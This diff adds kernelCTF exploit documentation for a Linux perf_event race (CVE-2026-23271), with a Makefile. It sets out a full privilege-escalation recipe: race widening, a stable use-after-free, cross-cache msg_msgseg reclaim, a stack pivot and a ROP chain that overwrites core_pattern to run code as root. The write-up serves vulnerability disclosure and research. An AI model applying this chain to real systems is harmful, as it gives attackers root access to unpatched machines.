149 changes: 149 additions & 0 deletions pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md
@@ -0,0 +1,149 @@
# Exploit

## Exploit Primitives

- **Vulnerable object**: `perf_event` (`perf_event_cache` slab, 0x520 bytes)
- **Primitive chain**: Race condition → time-limited UAF → stable UAF → cross-cache attack → reclaim with `msg_msgseg` → fake `perf_event` with controlled `destroy` pointer → stack pivot → ROP `core_pattern` overwrite

## Vulnerability Overview

There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`.

When a `perf_event` with `sigtrap=1` overflows, the kernel calls `task_work_add()` inside `__perf_event_overflow()` to schedule `perf_pending_task` for SIGTRAP delivery on return to userspace. If `perf_release()` runs concurrently on another thread and calls `_free_event()` → `call_rcu(free_event_rcu)` while the task_work is still queued, the `perf_event` is RCU-freed while the queued task_work still points at it. The subsequent `perf_pending_task` execution accesses the freed object, producing a UAF.

The kernel reports the race as a WARNING at the `WARN_ON_ONCE(!atomic_long_inc_not_zero(&event->refcount))` check in `__perf_event_overflow()`, which sets the `TAINT_WARN` taint bit. The exploit uses that bit as a reliable oracle to detect when the race has been won.
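
The taint oracle can be sketched as follows. This is a minimal illustration, not the exploit's actual code: the helper names (`taint_has_warn`, `read_taint_mask`, `warn_newly_set`) are hypothetical, and the only facts assumed are that `/proc/sys/kernel/tainted` exposes the taint mask as a decimal integer and that `TAINT_WARN` is bit 9 of that mask.

```cpp
#include <cstdint>
#include <fstream>

// Bit 9 of the taint mask is TAINT_WARN ('W'): the kernel has issued a warning.
constexpr uint64_t kTaintWarnBit = 1ULL << 9;

// Pure helper: does this taint mask include TAINT_WARN?
inline bool taint_has_warn(uint64_t mask) {
    return (mask & kTaintWarnBit) != 0;
}

// Reads the current taint mask into `out`.
// Returns false if the file cannot be opened or parsed.
inline bool read_taint_mask(uint64_t& out,
                            const char* path = "/proc/sys/kernel/tainted") {
    std::ifstream f(path);
    uint64_t mask = 0;
    if (!(f >> mask)) return false;
    out = mask;
    return true;
}

// True only if TAINT_WARN was clear in the baseline and is set now.
inline bool warn_newly_set(uint64_t baseline, uint64_t now) {
    return !taint_has_warn(baseline) && taint_has_warn(now);
}
```

Taint bits are sticky until reboot, so comparing against a baseline taken before the race attempt is what distinguishes a fresh win from a warning that fired earlier.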

## Race Timing Diagram

Three threads cooperate to trigger, widen, and stabilize the race:

- **Thread 1 (Worker, CPU 0)**: Creates the tracepoint perf\_event A, triggers overflow via `futex_wait` syscall entry, then blocks in the futex to widen the race window.
- **Thread 2 (Closer, CPU 1)**: Closes the perf\_event fd to free event A via RCU, then detects the WARN and opens the spray gate.
- **Thread 3 (Spray, CPU 0)**: Heap-sprays event B into event A's freed slot before `perf_pending_task` runs.

```
Thread 1 (Worker, CPU 0)                    Thread 2 (Closer, CPU 1)                Thread 3 (Spray, CPU 0)
========================                    =========================               ========================

[1] perf_event_open(type=TRACEPOINT,
      config=577 /* sys_enter_futex */,
      sigtrap=1, sample_period=1)
                                            [a] close(perf_event_fd)
[2] futex_wait(&futex_word, 0)                    |
    (futex_word is a userspace global,
     initially 0; expected_val=0)
      |                                           v
      | (syscall entry)                     perf_event_release_kernel
      v                                           |
    syscall_trace_enter                           |
      perf_syscall_enter                          |
        perf_trace_buf_submit                     |
          perf_tp_event                           |
            for_each_event:                       |
              event A found on list ···>    [b] perf_remove_from_context
              (event A still on list            (removes event A from list,
               at this point)                    but Thread 1 already holds
                                                 a reference to it)
            perf_swevent_event              [c] put_event
              (240-term filter                  atomic_long_dec_and_test
               evaluation                       → refcount = 0
               widens race window)                |
            __perf_event_overflow                 v
                                                _free_event
[3] task_work_add(current,                        __free_event
      &event->pending_task,                       call_rcu(&event->rcu_head,
      TWA_RESUME)                                   free_event_rcu)
    WARN_ON_ONCE(                                 |
      !atomic_long_inc_not_zero(                  |
        &event->refcount))                        |
    WARNING fires                                 |
      |                                     [d] detect WARNING
      |                                         poll /proc/sys/kernel/tainted
      |                                         to check if taint bit set
      |
      v
    do_futex → futex_wait_setup →
    enters wait queue, calls schedule()
      |                                                                             [A] RCU grace period completes
      |                                                                                 (free_event_rcu executes,
      |                                                                                  event A returned to slab)
      |                                                                                 spray: perf_event_open()
      |                                                                                 → event B allocated in
      |                                                                                   event A's freed slot
      |
      v
[5] futex_wait returns to userspace
      resume_user_mode_work
        task_work_run
          perf_pending_task ← UAF
            put_event(event)
              'event' now points to event B
              → event B refcount decremented to 0
              → event B freed via RCU
              → userspace still holds FD to event B
              → DANGLING FD (stable, reusable UAF)
```

## Exploitation

### Race Constraints (all must hold for successful exploitation)

1. **Thread 1 `perf_tp_event` before Thread 2 `perf_remove_from_context`**: The tracepoint handler must find event A on the event list before the closer removes it.

2. **Thread 2 `put_event` before Thread 1 `WARN_ON_ONCE`**: Event A's refcount must reach 0 (via `put_event`) before `__perf_event_overflow` tries `atomic_long_inc_not_zero`. If refcount > 0, the increment succeeds silently and no UAF occurs. The 240-term filter expression widens this window by increasing `filter_match_preds` execution time.

3. **`free_event_rcu` before Thread 1 `perf_pending_task`**: Event A must be returned to the slab (via the RCU callback) before `perf_pending_task` accesses it. The exploit ensures this by: (a) having the worker block in `futex_wait`, which puts its CPU through an RCU quiescent state, and (b) issuing `membarrier(MEMBARRIER_CMD_GLOBAL)`, which makes the kernel run `synchronize_rcu()` on the caller's behalf.

4. **Thread 3 spray before Thread 1 `perf_pending_task`**: Event B must occupy event A's freed slot before `perf_pending_task` runs `put_event`. The exploit achieves this by keeping the worker blocked in `futex_wait` until the event B spray has completed, then waking it via `FUTEX_WAKE`.
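
Constraint 3 relies on userspace being able to wait out an RCU grace period. A minimal sketch of that step is below, assuming only the standard `membarrier(2)` syscall interface. The wrapper name `wait_for_grace_period` is hypothetical and is not taken from the exploit source.

```cpp
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <cerrno>

// Issues membarrier(MEMBARRIER_CMD_GLOBAL) through the raw syscall interface.
// Returns 0 on success, or a negative errno value if the call is rejected
// (for example when the syscall is unavailable or filtered).
inline int wait_for_grace_period() {
    long rc = syscall(SYS_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);
    return rc == 0 ? 0 : -errno;
}
```

In the flow described above, a call like this would sit between detecting the WARNING and opening the spray gate, so that the spray targets a slot that has plausibly already been returned to the slab.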

### From Transient WARNING to Stable Dangling FD

The exploit converts a narrow, non-deterministic race into a stable UAF primitive in three stages:

1. **Transient race → WARNING**: The race between `__perf_event_overflow()` and `perf_remove_from_context()` is inherently narrow (on the order of microseconds). The 240-term filter expression and `futex_wait` blocking widen it. When the race succeeds, the kernel fires a WARNING via `__warn()`, which calls `add_taint(TAINT_WARN)` after printk completes. The exploit detects this by polling `/proc/sys/kernel/tainted` or by a wake-failure heuristic.

2. **WARNING → Spray reclaim**: After detecting the race win, the exploit opens the spray gate. Multiple pre-created threads create new perf\_events to reclaim event A's freed slab slot. One of these (event B) occupies event A's slot.

3. **Spray reclaim → Dangling FD**: When `perf_pending_task` runs as task\_work on the worker's return to userspace, it calls `put_event(event)` on what it believes is event A — but the memory now belongs to event B. This decrements event B's refcount to 0, triggering `_free_event` on event B. However, the spray thread still holds an open FD to event B. This FD is now a **dangling pointer** — it references freed memory that can be reclaimed by arbitrary kernel objects (e.g., `msg_msgseg` via cross-cache attack), enabling controlled read/write and ultimately ROP.

### From Dangling FD to Controlled Memory

With the dangling FD for event B, the exploit converts it into attacker-controlled memory in three steps:

1. **Spray & locate victim**: Spray perf\_events (event B) to reclaim event A's freed slab slot, then probe with additional events (event C) one at a time. Each perf\_event has a unique, monotonically increasing kernel-assigned ID, readable via `ioctl(PERF_EVENT_IOC_ID)`. Before probing, the exploit records every event B FD's original ID. After each event C allocation, it re-reads all event B IDs. If an event B FD's ID has changed from its recorded value, event C landed in the same memory and overwrote that slot, and this event B FD becomes the `victim_perf_fd`.
2. **Cross-cache attack**: Free all perf\_events in the victim's slab region, flush them from the SLUB `cpu_partial` list, and return the empty slab pages to the buddy system.
3. **`msg_msgseg` reclaim**: Spray `msg_msgseg` objects (via `msgsnd`) to reclaim the freed buddy pages. The `victim_perf_fd` now points to attacker-controlled `msg_msgseg` memory.
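
The ID-change check in step 1 reduces to comparing two snapshots. The sketch below shows only that comparison. The function name `find_changed_id` is hypothetical, and the snapshots are assumed to have been collected by calling `ioctl(fd, PERF_EVENT_IOC_ID, &id)` on each event B FD before and after an event C allocation.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Compares the IDs recorded before probing with the IDs re-read afterwards.
// Returns the index of the first FD whose ID changed, or -1 if none changed.
inline long find_changed_id(const std::vector<uint64_t>& recorded,
                            const std::vector<uint64_t>& current) {
    assert(recorded.size() == current.size());
    for (std::size_t i = 0; i < recorded.size(); ++i) {
        if (recorded[i] != current[i]) {
            return static_cast<long>(i);  // this slot was overwritten
        }
    }
    return -1;  // no overlap detected yet; keep probing
}
```

A result of `-1` means the latest event C did not land on any sprayed slot, so the probe loop allocates another event C and compares again.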

### ID Oracle (Victim Identification)

The exploit needs to determine which `msg_msgseg` overlaps the freed `perf_event` and at what offset. It uses a two-stage approach:

**Stage 1 — Probe payload**: Each `msg_msgseg` is filled with a unique stamp pattern: `(msg_idx << 32) | buffer_offset` at every 8-byte position. Critical fields (`ctx`, `parent`) are patched to valid values (`core_pattern` address, 0) to prevent kernel crashes if a close happens on the reclaimed event.

**Stage 2 — Oracle read**: The exploit calls `ioctl(PERF_EVENT_IOC_ID)` on `victim_perf_fd`. Since the underlying memory is now a `msg_msgseg`, the `event->id` field contains the stamp pattern. From this, the exploit extracts:
- The victim `msg_queue_ids` index (`id_val >> 32`)
- The exact byte offset of the event within the segment (`id_val & 0xFFFFFFFF`)
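
The stamp encoding and decoding can be illustrated as below. This is a sketch under the layout stated above (`(msg_idx << 32) | buffer_offset` at every 8-byte position). The names `make_stamp`, `fill_stamps`, `StampInfo`, and `decode_stamp` are hypothetical, and the patching of `ctx` and `parent` is deliberately left out.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Builds one 64-bit stamp: message index in the high half, offset in the low half.
inline uint64_t make_stamp(uint32_t msg_idx, uint32_t offset) {
    return (static_cast<uint64_t>(msg_idx) << 32) | offset;
}

// Fills a payload buffer with a stamp at every 8-byte position.
inline void fill_stamps(std::vector<uint8_t>& buf, uint32_t msg_idx) {
    assert(buf.size() % 8 == 0);
    for (std::size_t off = 0; off < buf.size(); off += 8) {
        uint64_t stamp = make_stamp(msg_idx, static_cast<uint32_t>(off));
        std::memcpy(buf.data() + off, &stamp, sizeof stamp);
    }
}

struct StampInfo {
    uint32_t msg_idx;  // which sprayed message overlaps the event
    uint32_t offset;   // byte offset inside that message's buffer
};

// Splits a value read back through the ID oracle into its two halves.
inline StampInfo decode_stamp(uint64_t id_val) {
    return {static_cast<uint32_t>(id_val >> 32),
            static_cast<uint32_t>(id_val & 0xFFFFFFFFu)};
}
```

Because every 8-byte word carries its own position, whichever word happens to overlap `event->id` identifies both the message and the location of that field within it.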

### ROP and Privilege Escalation

With the victim segment and offset known, the exploit builds a fake `perf_event` payload with safety fields (NULL out `ctx`, `rb`, `prog`, `cgrp`, `addr_filters` to skip cleanup paths; set `refcount=1` so `_free_event` triggers) and a `destroy` pointer set to a stack pivot gadget (`push rbx; pop rsp; pop rbp; ret`). The ROP chain at event+0x8 calls `_copy_from_user` to overwrite the kernel's `core_pattern` with `|/proc/%P/fd/666 %P`, then calls `msleep` to freeze the kernel thread.

Since a `perf_event` (0x520 bytes) is larger than a single `msg_msgseg` (0x400 bytes), the fake event payload inevitably spans two adjacent segments. The exploit handles this by spraying a "universal neighbor payload" into segments adjacent to the victim (window +/-16), overlaying both prev-segment and next-segment positions so the payload is valid regardless of which neighbor contains the other half. The victim segment itself is then sprayed with the exact-offset payload. Closing `victim_perf_fd` triggers `perf_release()` → `_free_event()` → `event->destroy(event)` → stack pivot → ROP chain execution.
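
The size mismatch can be made concrete with a small arithmetic sketch. It rests on a simplifying assumption that is not taken from the exploit: segments are modeled as contiguous fixed-size slots, any per-segment header is ignored, and `start` is measured from the beginning of the first slot. `Piece` and `split_across_slots` are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

struct Piece {
    std::size_t slot;    // index of the slot holding this part of the object
    std::size_t offset;  // where the part begins inside that slot
    std::size_t length;  // number of bytes of the object in that slot
};

// Splits an object of obj_size bytes beginning at byte `start` into the
// pieces that fall into consecutive slots of slot_size bytes each.
inline std::vector<Piece> split_across_slots(std::size_t start,
                                             std::size_t obj_size,
                                             std::size_t slot_size) {
    assert(slot_size > 0);
    std::vector<Piece> pieces;
    std::size_t pos = start;
    std::size_t remaining = obj_size;
    while (remaining > 0) {
        std::size_t off = pos % slot_size;
        std::size_t len = slot_size - off;  // room left in the current slot
        if (len > remaining) len = remaining;
        pieces.push_back({pos / slot_size, off, len});
        pos += len;
        remaining -= len;
    }
    return pieces;
}
```

For example, `split_across_slots(0x100, 0x520, 0x400)` yields a piece of 0x300 bytes in slot 0 and a piece of 0x220 bytes at the start of slot 1, which is why the neighbor segments need a payload that is valid in either position.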

A previously forked child process polls `/proc/sys/kernel/core_pattern`. Once overwritten, it crashes via NULL dereference, causing the kernel to execute the exploit binary as root (via fd 666 `memfd`). The binary uses `pidfd_open` + `pidfd_getfd` to steal the parent's stdio FDs and runs `cat /flag`.

### KASLR Leak (Prefetch Side-Channel)

To bypass KASLR, the exploit reuses the prefetch side-channel [technique](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-6817_mitigation/docs/exploit.md#kaslr-bypass) documented for CVE-2023-6817.

In the CI environment, `leak_kaslr_base` from libxdk is used. For manual testing on remote VMs, a separate Intel-optimized variant (`bypass_kaslr`) is selected.

## kernelXDK Integration

The exploit uses [kernelXDK](https://github.com/google/kernel-research) (libxdk) to decouple target-specific information from the exploit logic:

- **Target detection**: `TargetDb` + `AutoDetectTarget()` identifies the running kernel
- **Symbol resolution**: `GetSymbolOffset()` for `msleep`, `_copy_from_user`, `core_pattern`, and ROP gadgets
- **Structure offsets**: `GetFieldOffset()` for `perf_event` fields (`destroy`, `ctx`, `rb`, `pmu`, `refcount`, etc.)
- **ROP chain construction**: `RopChain::Add()` with KASLR-adjusted addresses
- **KASLR bypass**: `leak_kaslr_base()` for CI environments
30 changes: 30 additions & 0 deletions pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md
@@ -0,0 +1,30 @@
# Vulnerability

There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`.

For software/tracepoint-driven perf events, overflow handling could run with only
preemption disabled (not hard IRQ disabled). In that context, teardown paths such as
`perf_event_release_kernel()` -> `perf_remove_from_context()` could make progress
concurrently and invalidate callback-related event state still used by the overflow path
(for example `event->pending_task`), leading to use-after-free.


## Requirements to trigger the vulnerability
- Capabilities: None
- Kernel configuration: `CONFIG_PERF_EVENTS=y`
- User namespaces required: No

## Commit which introduced the vulnerability
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=592903cdcbf6

## Commit which fixed the vulnerability
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae

## Affected kernel versions
- 2.6.31-rc1 - 7.0-rc2

## Affected component, subsystem
- perf

## Cause
- race condition
@@ -0,0 +1,16 @@
KERNELXDK_INCLUDE_DIR ?= /usr/local/include
KERNELXDK_LIB_DIR ?= /usr/lib

CXXFLAGS = -O2 -Wall -static -pthread -I. -I$(KERNELXDK_INCLUDE_DIR)
LDFLAGS = -L$(KERNELXDK_LIB_DIR) -lkernelXDK

exploit: exploit.cpp target_db.kxdb
	g++ $(CXXFLAGS) -o $@ $< $(LDFLAGS)

target_db.kxdb:
	wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb

clean:
	rm -f exploit exploit_debug target_db.kxdb

.PHONY: clean
Binary file not shown.